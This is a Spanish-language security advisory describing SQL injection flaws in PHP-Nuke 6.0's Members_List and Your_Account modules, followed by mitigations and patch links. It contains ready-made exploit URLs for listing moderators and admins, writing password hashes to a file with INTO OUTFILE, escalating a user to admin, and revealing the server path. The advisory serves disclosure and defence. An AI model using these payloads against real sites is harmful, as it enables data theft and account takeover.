PHP-Nuke 6 y posiblemente superiores es vulnerable a varios ataques de
inyección de código que permitiría el acceso a datos sensibles y/o la
manipulación de la base de datos.
PHP-Nuke es un sistema de publicación basado en PHP muy popular entre
los portales de Internet. La vulnerabilidad, detectada en la versión 6.0,
está causada por un error de validación de entrada en los módulos
«Members_List» y «Your_Account» y será únicamente explotable cuando php
esté configurado con «magic_quotes_gpc=OFF» (normalmente en php.ini).
Unos ejemplos de como explotar esta problema:
* Listado de moderadores:
http://[victima]/modules.php?name=Members_List&letter=’%20OR%20user_level=’2’/*
* Listado de administradores:
http://[victima]/modules.php?name=Members_List&letter=’%20OR%20user_level=’4’/*
* Creación de un archivo con todas los claves encriptadas:
http://[victima]/modules.php?name=Your_Account&op=mailpasswd&uname=’)%20OR%201=1%20INTO%20OUTFILE%20’/[directorio]/Claves.txt’/*
http://[victima]/Claves.txt
* Elevación de privilegios:
http://[victima]/modules.php?name=Your_Account&op=savehome&broadcast=’,user_level=’4&uid=[NUESTRO_UID]
* Revelación de directorio local:
http://[victima]/modules/Forums/bb_smilies.php
Una solución rápida a esté problema, si tienes acceso a la configuración de php,
sería editar el php.ini y activar la opción «magic_quotes_gpc=ON». En caso
contrario en estos momentos ya existen parches en el web oficial.
fsantos@hispasec.com
Más información:
PHP-Nuke:
http://www.phpnuke.org
Parches de seguridad para PHP-Nuke 6.0:
http://www.phpnuke.org/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=342&ttitle=Security_Fixes_for_PHP-Nuke_6.0
Vulnerabilidades en PHP-Nuke:
http://www.frog-man.org/tutos/PHP-Nuke6.0-Members_List-Your_Account.txt
Deja una respuesta